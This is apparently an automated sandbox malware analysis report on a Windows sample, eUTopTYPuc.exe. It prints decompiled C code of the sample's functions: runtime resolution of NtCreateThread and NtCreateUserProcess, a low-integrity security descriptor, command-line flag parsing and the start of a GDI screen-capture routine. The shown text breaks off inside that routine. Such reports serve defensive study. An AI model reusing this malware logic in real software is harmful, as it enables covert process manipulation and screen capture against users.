WININET.dll	HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpAddRequestHeadersA, InternetQueryOptionA, InternetOpenA, HttpOpenRequestA, InternetSetOptionA, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: eUTopTYPuc.exe PID: 632 Parent PID: 5732

General

Start time:	15:10:58
Start date:	07/02/2021
Path:	C:\Users\user\Desktop\eUTopTYPuc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eUTopTYPuc.exe'
Imagebase:	0x400000
File size:	141824 bytes
MD5 hash:	09580EC10DF3398CE68C176121FBBA66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: eUTopTYPuc.exe PID: 632 Parent PID: 5732 eUTopTYPuc.exeCOMMON

Executed Functions

Function 00412A7D, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00412A7D(signed int** __ecx, void* __edx, signed char _a4) {
				char _v293;
				char _v780;
				char _v788;
				char _v800;
				intOrPtr _v808;
				intOrPtr _v812;
				signed int _v816;
				intOrPtr _v820;
				signed int** _v824;
				struct HINSTANCE__* _v828;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				void* _t73;
				intOrPtr _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t81;
				int _t83;
				signed int _t86;
				void* _t89;
				signed int* _t91;
				signed int _t95;
				WCHAR* _t97;
				void* _t98;
				signed int* _t100;

				_t89 = __edx;
				_t87 = __ecx;
				_t95 = _a4 & 0x00000001;
				_v816 = _t95;
				if(_t95 != 0) {
					_t83 = 0;
					__eflags = 0;
				} else {
					_t83 = 0;
					 *0x423968 = 0;
				}
				_t91 = E00412738();
				 *0x423980 = _t91;
				if(_t91 == _t83) {
					L27:
					_t40 = 0;
				} else {
					if(_t95 != _t83) {
						_v816 = E00412672(_t87, _t89, _t91, "GetProcAddress");
						_v816 = E00412672(_t87, _t89, _t91, "LoadLibraryA");
						_t43 =  *0x42397c;
						_v828 = _t43;
						_t87 =  *((intOrPtr*)(_t43 + 0x3c)) + _t43 + 0x80;
						__eflags = _v816 - _t83;
						if(_v816 == _t83) {
							goto L21;
						} else {
							__eflags = _v812 - _t83;
							if(_v812 == _t83) {
								goto L21;
							} else {
								_t91 =  *_t87;
								__eflags = _t91 - _t83;
								if(_t91 <= _t83) {
									goto L21;
								} else {
									__eflags = _t87[1] - 0x14;
									if(_t87[1] <= 0x14) {
										goto L21;
									} else {
										_t91 = _t91 + _t43;
										__eflags =  *_t91 - _t83;
										if( *_t91 == _t83) {
											goto L21;
										} else {
											while(1) {
												_t77 = _v808(_t91[3] + _v820);
												_v808 = _t77;
												__eflags = _t77 - _t83;
												if(_t77 == _t83) {
													goto L27;
												}
												_t100 = _v824 +  *_t91;
												_t86 = _v824 + _t91[4];
												while(1) {
													_t78 =  *_t100;
													__eflags = _t78;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t87 = _v824;
														_t79 =  &(_v824[0]) + _t78;
													} else {
														_t79 = _t78 & 0x0000ffff;
													}
													_t80 = _v816(_v808, _t79);
													__eflags = _t80;
													if(_t80 == 0) {
														goto L27;
													} else {
														 *_t86 = _t80;
														_t100 =  &(_t100[1]);
														_t86 = _t86 + 4;
														__eflags = _t86;
														continue;
													}
													goto L47;
												}
												_t91 =  &(_t91[5]);
												_t83 = 0;
												__eflags =  *_t91;
												if( *_t91 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t81 = GetModuleHandleW(_t83);
						 *0x42397c = _t81;
						if(_t81 == _t83) {
							goto L27;
						} else {
							L21:
							_t97 =  &_v800;
							E00405B00(0xe5, _t97);
							_t47 = GetModuleHandleW(_t97);
							 *0x423984 = _t47;
							if(_t47 == _t83) {
								goto L27;
							} else {
								_t98 = GetProcAddress;
								 *0x423988 = GetProcAddress(_t47, "NtCreateThread");
								 *0x42398c = GetProcAddress( *0x423984, "NtCreateUserProcess");
								 *0x423990 = GetProcAddress( *0x423984, "NtQueryInformationProcess");
								 *0x423994 = GetProcAddress( *0x423984, "RtlUserThreadStart");
								 *0x423998 = GetProcAddress( *0x423984, "LdrLoadDll");
								_t53 = GetProcAddress( *0x423984, "LdrGetDllHandle");
								 *0x42399c = _t53;
								if( *0x423988 != _t83 ||  *0x42398c != _t83) {
									if( *0x423990 == _t83 ||  *0x423998 == _t83 || _t53 == _t83) {
										goto L27;
									} else {
										_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
										 *0x4231a4 = _t54;
										__eflags = _t54 - _t83;
										if(_t54 != _t83) {
											 *0x4223b3 = 1;
										} else {
											 *0x4231a4 = GetProcessHeap();
											 *0x4223b3 = 0;
										}
										 *0x4227d8 = _t83;
										 *0x4223b2 = 0;
										InitializeCriticalSection(0x4237dc);
										 *0x423774 = _t83; // executed
										__imp__#115(0x202,  &_v780); // executed
										_t57 = E00412772(_a4, _t87, _t91, _t98);
										__eflags = _t57;
										if(_t57 == 0) {
											goto L27;
										} else {
											__eflags = _v824 - _t83;
											if(_v824 != _t83) {
												L34:
												_t58 = E0040849C(_t87, 0xffffffff, 0x423978);
												 *0x42396c = _t58;
												__eflags = _t58 - _t83;
												if(_t58 == _t83) {
													goto L27;
												} else {
													 *0x423970 = GetLengthSid( *_t58);
													 *0x423974 = E00408234( *( *0x42396c), _t59);
													_t62 = E004127F1(_t61, _a4);
													__eflags = _t62;
													if(_t62 == 0) {
														goto L27;
													} else {
														 *0x423bd8 = GetCurrentProcessId();
														 *0x423bdc = _t83;
														__eflags = _v824 - _t83;
														if(_v824 != _t83) {
															_t64 = 1;
														} else {
															_t64 = E00412853();
														}
														__eflags = _t64;
														if(_t64 == 0) {
															goto L27;
														} else {
															__eflags = _v824 - _t83;
															if(_v824 == _t83) {
																E00413167( &_v788);
																_t87 = 0x423dd6;
																E0040B4DE(0x423dd6, 0x423be0,  *0x423974,  &_v293, _t83);
															}
															_t65 = E004128A5(_a4);
															__eflags = _t65;
															if(_t65 == 0) {
																goto L27;
															} else {
																__eflags = _a4 & 0x00000002;
																 *0x4231b4 = _t83;
																 *0x423348 = 0;
																 *0x423f60 = 0;
																 *0x423ef8 = 0;
																 *0x423e80 = 0;
																 *0x4237f8 = 0;
																 *0x423778 = 0;
																if(__eflags == 0) {
																	_t67 = 1;
																} else {
																	_t67 = E0041295C(_t87, _t89, __eflags);
																}
																__eflags = _t67;
																_t38 = _t67 != 0;
																__eflags = _t38;
																_t40 = _t67 & 0xffffff00 | _t38;
															}
														}
													}
												}
											} else {
												_t73 = CreateEventW(0x4239a0, 1, _t83, _t83);
												 *0x423e30 =  *0x423e30 | 0xffffffff;
												 *0x423e2c = _t73;
												__eflags = _t73 - _t83;
												if(_t73 == _t83) {
													goto L27;
												} else {
													goto L34;
												}
											}
										}
									}
								} else {
									goto L27;
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x00412a7d
0x00412a7d
0x00412a8e
0x00412a92
0x00412a96
0x00412aa2
0x00412aa2
0x00412a98
0x00412a98
0x00412a9a
0x00412a9a
0x00412aa9
0x00412aab
0x00412ab3
0x00412c38
0x00412c38
0x00412ab9
0x00412abb
0x00412ae5
0x00412aee
0x00412af2
0x00412afa
0x00412afe
0x00412b05
0x00412b09
0x00000000
0x00412b0b
0x00412b0b
0x00412b0f
0x00000000
0x00412b11
0x00412b11
0x00412b13
0x00412b15
0x00000000
0x00412b17
0x00412b17
0x00412b1b
0x00000000
0x00412b1d
0x00412b1d
0x00412b1f
0x00412b21
0x00000000
0x00412b23
0x00412b23
0x00412b2b
0x00412b2f
0x00412b33
0x00412b35
0x00000000
0x00000000
0x00412b40
0x00412b44
0x00412b74
0x00412b74
0x00412b76
0x00412b78
0x00000000
0x00000000
0x00412b4a
0x00412b53
0x00412b57
0x00412b4c
0x00412b4c
0x00412b4c
0x00412b60
0x00412b64
0x00412b66
0x00000000
0x00412b6c
0x00412b6c
0x00412b6e
0x00412b71
0x00412b71
0x00000000
0x00412b71
0x00000000
0x00412b66
0x00412b7a
0x00412b7d
0x00412b7f
0x00412b81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00412b81
0x00000000
0x00412b23
0x00412b21
0x00412b1b
0x00412b15
0x00412b0f
0x00412abd
0x00412abe
0x00412ac4
0x00412acb
0x00000000
0x00412ad1
0x00412b83
0x00412b83
0x00412b8c
0x00412b94
0x00412b9a
0x00412ba1
0x00000000
0x00412ba7
0x00412ba7
0x00412bc0
0x00412bd2
0x00412be4
0x00412bf6
0x00412c08
0x00412c0d
0x00412c0f
0x00412c1a
0x00412c2a
0x00000000
0x00412c3f
0x00412c46
0x00412c4c
0x00412c51
0x00412c53
0x00412c69
0x00412c55
0x00412c5b
0x00412c60
0x00412c60
0x00412c75
0x00412c7b
0x00412c82
0x00412c92
0x00412c98
0x00412ca1
0x00412ca6
0x00412ca8
0x00000000
0x00412caa
0x00412caa
0x00412cae
0x00412cd3
0x00412cda
0x00412cdf
0x00412ce4
0x00412ce6
0x00000000
0x00412cec
0x00412cf4
0x00412d09
0x00412d0e
0x00412d13
0x00412d15
0x00000000
0x00412d1b
0x00412d21
0x00412d26
0x00412d2c
0x00412d30
0x00412d39
0x00412d32
0x00412d32
0x00412d32
0x00412d3b
0x00412d3d
0x00000000
0x00412d43
0x00412d43
0x00412d47
0x00412d4d
0x00412d61
0x00412d70
0x00412d70
0x00412d78
0x00412d7d
0x00412d7f
0x00000000
0x00412d85
0x00412d87
0x00412d8b
0x00412d91
0x00412d97
0x00412d9d
0x00412da3
0x00412da9
0x00412daf
0x00412db5
0x00412dbe
0x00412db7
0x00412db7
0x00412db7
0x00412dc0
0x00412dc2
0x00412dc2
0x00412dc2
0x00412dc2
0x00412d7f
0x00412d3d
0x00412d15
0x00412cb0
0x00412cb9
0x00412cbf
0x00412cc6
0x00412ccb
0x00412ccd
0x00000000
0x00000000
0x00000000
0x00000000
0x00412ccd
0x00412cae
0x00412ca8
0x00000000
0x00000000
0x00000000
0x00412c1a
0x00412ba1
0x00412acb
0x00412abb
0x00412dc5
0x00412dcb

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412ABE
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412B94
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412BB3
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412BC5
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412BD7
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412BE9
GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412BFB
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412C0D
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00412C46
GetProcessHeap.KERNEL32(?,?,00000000), ref: 00412C55
InitializeCriticalSection.KERNEL32(004237DC,?,?,00000000), ref: 00412C82
WSAStartup.WS2_32(00000202,?), ref: 00412C98
CreateEventW.KERNEL32(004239A0,00000001,00000000,00000000,?,?,00000000), ref: 00412CB9
GetLengthSid.ADVAPI32(00000000,000000FF,00423978,?,?,00000000), ref: 00412CEE
GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00412D1B

Strings

GetProcAddress, xrefs: 00412AD6
LdrLoadDll, xrefs: 00412BEB
NtCreateUserProcess, xrefs: 00412BB5
NtCreateThread, xrefs: 00412BAD
LoadLibraryA, xrefs: 00412AE0
NtQueryInformationProcess, xrefs: 00412BC7
RtlUserThreadStart, xrefs: 00412BD9
LdrGetDllHandle, xrefs: 00412BFD

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-305303173
Opcode ID: c4c1bf7b7533ff3637532fa909ff5ff9e23dcb51054f97e224ed9cc91caf1783
Instruction ID: 6fd7323765c200343f8b2e40ef8cc7218089845594bba861b031fcf4b7df9b95
Opcode Fuzzy Hash: c4c1bf7b7533ff3637532fa909ff5ff9e23dcb51054f97e224ed9cc91caf1783
Instruction Fuzzy Hash: A891B0B16053059BCB20AF60EE8569B7BB0BB45306B50093FE545E3260E7BC9AD6CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A474, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040A474(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x0040a474
0x0040a474
0x0040a486
0x00000000
0x0040a499
0x0040a49a
0x0040a4a5
0x0040a4ad
0x0040a4e8
0x0040a4e8
0x0040a4ec
0x0040a4ee
0x0040a4f0
0x0040a4f6
0x0040a4f9
0x0040a4f9
0x00000000
0x0040a4fc
0x0040a4be
0x0040a4c9
0x0040a4e2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a4c9

APIs

InitializeSecurityDescriptor.ADVAPI32(004239AC,00000001,00000000,00412CA6,?,?,00000000), ref: 0040A47E
SetSecurityDescriptorDacl.ADVAPI32(004239AC,00000001,00000000,00000000,?,?,00000000), ref: 0040A48F
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040A4A5
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0040A4C1
SetSecurityDescriptorSacl.ADVAPI32(004239AC,?,?,?,?,?,00000000), ref: 0040A4D5
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0040A4E2

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 0040A4A0

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: d451d168c0620a0446bd3ad444519186941ac7e658922285720047486cfde1f9
Instruction ID: 7974bb3cf7227678d72dc9ba89ec9f4832df9e444e5d27d453bdc037707ee1ac
Opcode Fuzzy Hash: d451d168c0620a0446bd3ad444519186941ac7e658922285720047486cfde1f9
Instruction Fuzzy Hash: 87115E75A00208BFEF219FA48EC8EAFBBBCBB04740F10417AF251F11A0D7759A509B25

Uniqueness

Uniqueness Score: -1.00%

Function 0040B428, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040B428() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E00406F38(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x0040b429
0x0040b438
0x0040b444
0x0040b447
0x0040b44f
0x0040b4c6
0x0040b4cc
0x0040b451
0x0040b45e
0x0040b460
0x0040b48f
0x0040b49c
0x0040b4a0
0x00000000
0x00000000
0x0040b46f
0x0040b484
0x00000000
0x0040b486
0x0040b48d
0x00000000
0x0040b48d
0x00000000
0x0040b484
0x0040b4a7
0x00000000
0x0040b4a9
0x0040b4ae
0x0040b4b2
0x0040b4b6
0x0040b4be
0x00000000
0x0040b4c0
0x0040b4c0
0x0040b4c0
0x0040b4be
0x0040b4a7
0x0040b4d1
0x0040b4db

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0040B447
PathAddBackslashW.SHLWAPI(?), ref: 0040B45E
PathRemoveBackslashW.SHLWAPI(?), ref: 0040B46F
PathRemoveFileSpecW.SHLWAPI(?), ref: 0040B47C
PathAddBackslashW.SHLWAPI(?), ref: 0040B48D
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0040B49C
CLSIDFromString.OLE32(?,?), ref: 0040B4B6

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 1fe148faab61c815cb9d2e44628d9fe61072a704d3843085a379526b694f5e52
Instruction ID: 443801c366bcc98e3a266fe1d98edea127dd2f5d8d472aae4a214e74d883bab7
Opcode Fuzzy Hash: 1fe148faab61c815cb9d2e44628d9fe61072a704d3843085a379526b694f5e52
Instruction Fuzzy Hash: 1A116D7190420DAADF209BB09D88EEF77ACEF04744F144476B914F31A1E339DA489B68

Uniqueness

Uniqueness Score: -1.00%

Function 004139F2, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, signed int __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				void* _t50;

				_t50 = __fp0;
				_t35 = __edx;
				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E00412A7D(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E004136AC(_t34, _t35, __eflags, _t50, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x423968 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t35 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t47 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E0040D9C1(_t35);
						_t29 = E004057F1();
						__eflags =  *0x423968 & 0x00000004;
						_t33 = _t29;
						if(( *0x423968 & 0x00000004) != 0) {
							_t29 = E0040D83A(0x4231b8, 0);
						}
						goto L21;
					}
					_t29 = E004134BE(_t47);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t35 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t35 = _t35 + 1;
				} while (_t35 < _v12);
				goto L14;
			}

0x004139f2
0x004139f2
0x004139f2
0x004139fb
0x004139fd
0x00413a04
0x00413ade
0x00413ae0
0x00413ae2
0x00413ae2
0x00413ae6
0x00413ae6
0x00413a0f
0x00413a12
0x00413a16
0x00413a19
0x00413a2a
0x00413a32
0x00413ab9
0x00413abf
0x00413ac4
0x00413ac4
0x00413ac6
0x00413ac8
0x00000000
0x00413ad3
0x00413ad5
0x00413add
0x00413add
0x00413ac8
0x00413a38
0x00413a3d
0x00413a7e
0x00413a7f
0x00413a85
0x00413a87
0x00413a90
0x00413a94
0x00000000
0x00000000
0x00413a96
0x00413a9b
0x00413aa0
0x00413aa7
0x00413aa9
0x00413ab2
0x00413ab2
0x00000000
0x00413aa9
0x00413a89
0x00000000
0x00000000
0x00000000
0x00000000
0x00413a3f
0x00413a3f
0x00413a3f
0x00413a44
0x00413a4c
0x00413a53
0x00413a74
0x00413a55
0x00413a58
0x00413a70
0x00413a5a
0x00413a5d
0x00413a6a
0x00413a5f
0x00413a62
0x00413a64
0x00413a64
0x00413a62
0x00413a5d
0x00413a58
0x00413a53
0x00413a78
0x00413a79
0x00000000

APIs

Part of subcall function 00412A7D: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412ABE
Part of subcall function 00412A7D: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412B94
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412BB3
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412BC5
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412BD7
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412BE9
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412BFB
Part of subcall function 00412A7D: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412C0D

SetErrorMode.KERNEL32(00008007,00000000), ref: 00413A19
GetCommandLineW.KERNEL32(?), ref: 00413A23
CommandLineToArgvW.SHELL32(00000000), ref: 00413A2A
LocalFree.KERNEL32(00000000), ref: 00413A7F
Sleep.KERNEL32(000000FF,?,00000001), ref: 00413AD5
ExitProcess.KERNEL32 ref: 00413AE6

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 1184560534-0
Opcode ID: 90556e5a0e035d1edcef6f1ada19a004e8b6826e8c76c31657c10fe69d562758
Instruction ID: a15749b3b6650ca325594cf02fc8f71ca77a5a32ea9d633044d43a9a58a78b47
Opcode Fuzzy Hash: 90556e5a0e035d1edcef6f1ada19a004e8b6826e8c76c31657c10fe69d562758
Instruction Fuzzy Hash: B1210730944244A5DB259FB989497EE3BA45F023CAF1C409BE0C17A2A2C77E4BC9C71E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411FB9, Relevance: 84.4, APIs: 27, Strings: 21, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00411FB9(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					_t168 =  &_v32; // 0x41247c
					return  *_t168;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
